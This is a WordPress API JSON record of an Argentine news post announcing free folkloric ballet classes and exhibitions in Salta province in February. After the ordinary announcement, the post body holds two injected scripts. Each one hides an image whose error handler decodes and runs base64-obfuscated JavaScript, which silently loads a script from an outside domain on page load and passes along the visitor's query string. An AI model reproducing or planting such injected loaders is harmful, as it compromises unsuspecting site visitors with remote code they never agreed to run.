{"id":3663,"date":"2024-02-09T10:26:49","date_gmt":"2024-02-09T13:26:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3663"},"modified":"2025-08-14T00:00:57","modified_gmt":"2025-08-14T03:00:57","slug":"vacaciones-en-cultura-disfruta-de-las-actividades-del-ballet-folklorico-de-la-provincia-con-entrada-libre-y-gratuita","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3663","title":{"rendered":"Vacaciones en Cultura: Disfrut\u00e1 de las actividades del Ballet Folkl\u00f3rico de la Provincia con entrada libre y gratuita"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-767a131d8cc8a99b81f1a8e89ff4e00f\" style=\"background-color:#7c0538\"><em>El cuerpo art\u00edstico har\u00e1 su presentaci\u00f3n en el ciclo de verano con presentaciones y clases magistrales en Salta Capital, Or\u00e1n y Rosario de la Frontera<\/em><\/h3>\n\n\n\n<p>El Ballet Folkl\u00f3rico de la Provincia de Salta \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d, realizar\u00e1 su presentaci\u00f3n en el ciclo Vacaciones en Cultura con actividades libres y gratuitas en Salta capital, Or\u00e1n y Rosario de la Frontera.<\/p>\n\n\n\n<p>Las parejas de bailarines profesionales ofrecer\u00e1n distintas capacitaciones, clases magistrales e introductorias, junto a peque\u00f1as exhibiciones como cierre de las mismas de acuerdo al siguiente cronograma<\/p>\n\n\n\n<p><strong>Viernes 16 de febrero<\/strong><\/p>\n\n\n\n<p>Capacitaci\u00f3n Master Class en la Municipalidad de Or\u00e1n. Actividad recomendada para j\u00f3venes a partir de los 16 a\u00f1os. Las clases se brindar\u00e1n en funci\u00f3n de los lenguajes: Estilizaci\u00f3n Folk, Contempor\u00e1neo aplicado a la danza folk; y Malambo femenino y masculino.<\/p>\n\n\n\n<p>Estas capacitaciones se dar\u00e1n en conjunto a bailarines destacados del municipio. Las mismas comenzar\u00e1n a partir de las 9 hs y contar\u00e1n con una duraci\u00f3n estimada de una hora y treinta minutos cada una. Al cierre se dar\u00e1 una breve exhibici\u00f3n por parte de los bailarines. Las inscripciones se encuentran disponibles a trav\u00e9s de la Secretar\u00eda de Cultura de Or\u00e1n al 3878 58-9412.<\/p>\n\n\n\n<p><strong>Jueves 22 de Febrero<\/strong><\/p>\n\n\n\n<p>En el Museo de Arte Contempor\u00e1neo, Zuvir\u00eda 90 se realizar\u00e1 una capacitaci\u00f3n Master Class Contempor\u00e1neo a partir de las 17 hs. Las clases estar\u00e1n orientadas espec\u00edficamente a la danza folk para nivel intermedio \u2013 avanzado. Actividad recomendada para bailarines de 12 a\u00f1os en adelante.<\/p>\n\n\n\n<p>Desde las 18 hs, se realizar\u00e1 una muestra exhibici\u00f3n por parte de los bailarines del Ballet Folkl\u00f3rico que protagonizar\u00e1n las clases magistrales.<\/p>\n\n\n\n<p><strong>Viernes 23 de Febrero<\/strong><\/p>\n\n\n\n<p>En el Museo G\u00fcemes, Espa\u00f1a 730, se realizar\u00e1 un taller did\u00e1ctico de danzas folkl\u00f3ricas \u201cCoquena\u201d a partir de las 17 hs con entrada libre y gratuita hasta agotar aforo. Esta actividad est\u00e1 destinada para ni\u00f1os a partir de 3 a\u00f1os en adelante.<\/p>\n\n\n\n<p><strong>S\u00e1bado 24 de Febrero<\/strong><\/p>\n\n\n\n<p>Desde las 9hs en el Teatro Municipal Mart\u00edn Miguel de G\u00fcemes del Municipio de Rosario de la Frontera se realizar\u00e1 la Capacitaci\u00f3n Master Class para bailarines a partir de 16 a\u00f1os, en los siguientes lenguajes: Estilizaci\u00f3n Folk; Introducci\u00f3n a la danza contempor\u00e1nea aplicado a la danza folk; y Tango.<\/p>\n\n\n\n<p>Las capacitaciones tendr\u00e1n duraci\u00f3n de una hora y treinta minutos cada una. Las inscripciones se encuentran disponibles a trav\u00e9s de la Secretar\u00eda de Cultura de Rosario de la Frontera en colaboraci\u00f3n con el Museo al 3876530592. Al cierre de la jornada, se dar\u00e1 una breve exhibici\u00f3n a cargo de los bailarines del Ballet Folkl\u00f3rico.<\/p>\n\n\n\n<p>A partir de las 17 hs, se realizar\u00e1 una capacitaci\u00f3n Master Class aplicado a la danza folk para nivel intermedio &#8211; avanzado en el Museo de Bellas Artes de Salta, Belgrano 992. Actividad recomendada para bailarines de 12 a\u00f1os en adelante.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vacaciones-en-cultura-disfruta-de-las-actividades-del-ballet-folklorico-de-la-provincia-con-entrada-libre-y-gratuita-94151\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de prensa y difusi\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El cuerpo art\u00edstico har\u00e1 su presentaci\u00f3n en el ciclo de verano con presentaciones y clases magistrales en Salta Capital, Or\u00e1n y Rosario de la Frontera El Ballet Folkl\u00f3rico de la Provincia de Salta \u201cGral. Mart\u00edn Miguel de G\u00fcemes\u201d, realizar\u00e1 su presentaci\u00f3n en el ciclo Vacaciones en Cultura con actividades libres y gratuitas en Salta capital, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3664,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26,13],"tags":[],"class_list":{"0":"post-3663","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3663"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3663"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3663\/revisions"}],"predecessor-version":[{"id":6857,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3663\/revisions\/6857"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3664"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3663"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3663"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3663"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}